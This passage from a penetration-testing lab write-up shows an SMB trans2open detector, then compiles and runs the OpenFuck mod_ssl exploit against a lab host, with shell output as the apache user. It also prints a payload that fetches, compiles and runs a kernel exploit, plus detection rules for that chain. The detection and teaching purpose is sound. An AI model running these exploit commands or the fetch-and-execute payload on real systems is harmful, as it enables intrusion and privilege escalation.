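def is_trans2open_attempt(pkt: bytes) -> bool:
    """Flag TRANS2_OPEN2 requests whose parameter block is implausibly large."""
    info = parse_smb_request(pkt)
    if not info or info["command"] != SMB_COM_TRANSACTION2:
        return False
    if info.get("subcommand") != TRANS2_OPEN2:
        return False
    return max(info["total_param"], info["param_count"]) > PARAM_LIMIT


def build_trans2(subcommand: int, param_len: int) -> bytes:
    """Constructed test packet: a minimal Trans2 request with a zero-filled
    parameter block and no data section. It exercises the parser only; it is
    not a usable SMB request."""
    smb_header = b"\xffSMB" + bytes([SMB_COM_TRANSACTION2]) + b"\x00" * (SMB_HEADER_LEN - 5)
    words = struct.pack(TRANS2_WORDS, param_len, 0, 0, 0, 0, 0, 0, 0, 0,
                        param_len, 0, 0, 0, 1, 0)
    setup = struct.pack("<H", subcommand)
    body = bytes([15]) + words + setup + struct.pack("<H", param_len) + b"\x00" * param_len
    smb = smb_header + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    for label, pkt in (("benign open", build_trans2(TRANS2_OPEN2, 40)),
                       ("oversized open", build_trans2(TRANS2_OPEN2, 2000))):
        print(label, "->", "ALERT" if is_trans2open_attempt(pkt) else "ok")
```

In practice the same check sits behind a pcap reader or an IDS rule on port 139/445; the heuristic stays useful after the server is patched, because a large OPEN2 parameter block has no legitimate purpose regardless of the Samba version behind it.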

## apache

Searched Metasploit for the Apache vulnerabilities and found no suitable attack.

searchsploit has a few; try them.

First install the OpenSSL development library: apt-get install libssl-dev

Compile the sources. Of the three mod_ssl exploits, only one, 47080, actually built.

```
┌──(root㉿kali)-[~/Desktop]
└─# gcc -o 47080 47080.c -lcrypto
┌──(root㉿kali)-[~/Desktop]
└─# ./47080 0x6b 192.168.74.133

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fc098
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--01:14:38--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ 
bash-2.05$ whoami
whoami
apache
```

Got the apache user.

Why only the apache user? Because the payload the exploit runs has to reach the external network to download a kernel exploit, compile it and then escalate, and because of the GFW the download fails, so no escalation happens. We could upload the file manually and escalate from there, or drop this payload and try a different approach.

Download address for the privilege escalation module: https://dl.packetstormsecurity.net/0-exploits/ptrace-kmod.c

Original payload:

```
unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-d.c; ./exploit;
```

With that escalation, root is obtained.
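The payload OpenFuck runs after landing is a textbook post-exploitation chain: suppress shell history, work in /tmp, fetch an exploit source, compile it on the victim and run it, all as the web server's uid. That chain is exactly what host telemetry should catch even when, as here, the download fails. As an added example (not from the page), the Python below applies detection rules for that behaviour to a few constructed process-start events; the event shape, the attacker.example host, the user names and the rule thresholds are assumptions.

```python
import re
from typing import Dict, List

SERVICE_ACCOUNTS = {"apache", "www-data", "httpd", "nobody"}   # assumed for this host
SHELLS = {"sh", "bash", "dash"}
DOWNLOADERS = {"wget", "curl", "ftp", "tftp", "nc"}
COMPILERS = {"gcc", "cc", "g++", "make"}
SCRATCH_DIRS = r"/(?:tmp|var/tmp|dev/shm)\b"

# Constructed process-start events in a simplified auditd/EDR shape. Event 0
# mirrors the payload printed above with the download host replaced by a
# placeholder; the others are benign activity for contrast.
EVENTS = [
    {"user": "apache", "parent": "httpd",
     "cmd": "/bin/sh -c unset HISTFILE; cd /tmp; wget http://attacker.example/ptrace-kmod.c; "
            "gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit"},
    {"user": "root", "parent": "init", "cmd": "/usr/sbin/httpd"},
    {"user": "devuser", "parent": "bash", "cmd": "gcc -o hello hello.c"},
    {"user": "apache", "parent": "httpd",
     "cmd": "/usr/bin/wget -q -O /var/cache/feed.xml http://mirror.example/feed.xml"},
]


def programs_in(cmd: str) -> set:
    """Basenames of every token on the command line (cheap, shell-agnostic)."""
    return {tok.rsplit("/", 1)[-1] for tok in re.split(r"[\s;|&]+", cmd) if tok}


def analyze(event: Dict[str, str]) -> List[str]:
    """Return the ids of the detection rules that fire for one event."""
    user, cmd = event["user"], event["cmd"]
    progs = programs_in(cmd)
    hits = []
    if user in SERVICE_ACCOUNTS:            # a web server uid has no business doing these
        if progs & SHELLS:
            hits.append("service-account-shell")
        if progs & DOWNLOADERS:
            hits.append("service-account-download")
        if progs & COMPILERS:
            hits.append("service-account-compile")
    if re.search(r"\bunset\s+HISTFILE\b|HISTFILE=/dev/null", cmd):
        hits.append("history-suppression")     # anti-forensics, any user
    # Executing something out of a world-writable scratch directory.
    if re.search(r"\bcd\s+" + SCRATCH_DIRS, cmd) and re.search(r"(?:^|\s)\./\S+", cmd):
        hits.append("scratch-dir-execution")
    elif re.search(SCRATCH_DIRS + r"/\S+", cmd):
        hits.append("scratch-dir-execution")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> fired rules, keeping only events with at least one hit."""
    result = {}
    for i, ev in enumerate(events):
        hits = analyze(ev)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for idx, hits in scan(EVENTS).items():
        print(f"event {idx}: {len(hits)} rule(s) -> {', '.join(hits)}")
```

Event 0 trips all five rules at once, which is the signal to alert on; event 3 (a lone download by the service account) trips one and is the kind of thing worth a lower-severity review rather than a page. Mounting /tmp noexec and removing compilers from production web hosts would have stopped the chain outright even with network egress available.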

# Summary

This lab was still played somewhat chaotically and without method, mainly because I want to build a Windows toolkit, and attacking from Windows differs in some ways from attacking from Kali.

The information-gathering results were never consolidated; I kept doing whatever came to mind next, and that approach definitely has problems.

My ability to run programming-related exploits is far too weak: I can't write exploit scripts myself and can barely read them. I've done too little in this area and need to strengthen my programming, and broaden the range of tools I use.

I'm still far too unfamiliar with this style of attack.

In future labs I'll try to keep the initial information-gathering phase completely separate from exploitation, and do a consolidation once gathering is complete.

These labs really aren't suited to Windows; Kali is much more comfortable, so I'll switch to Kali as the main environment from now on.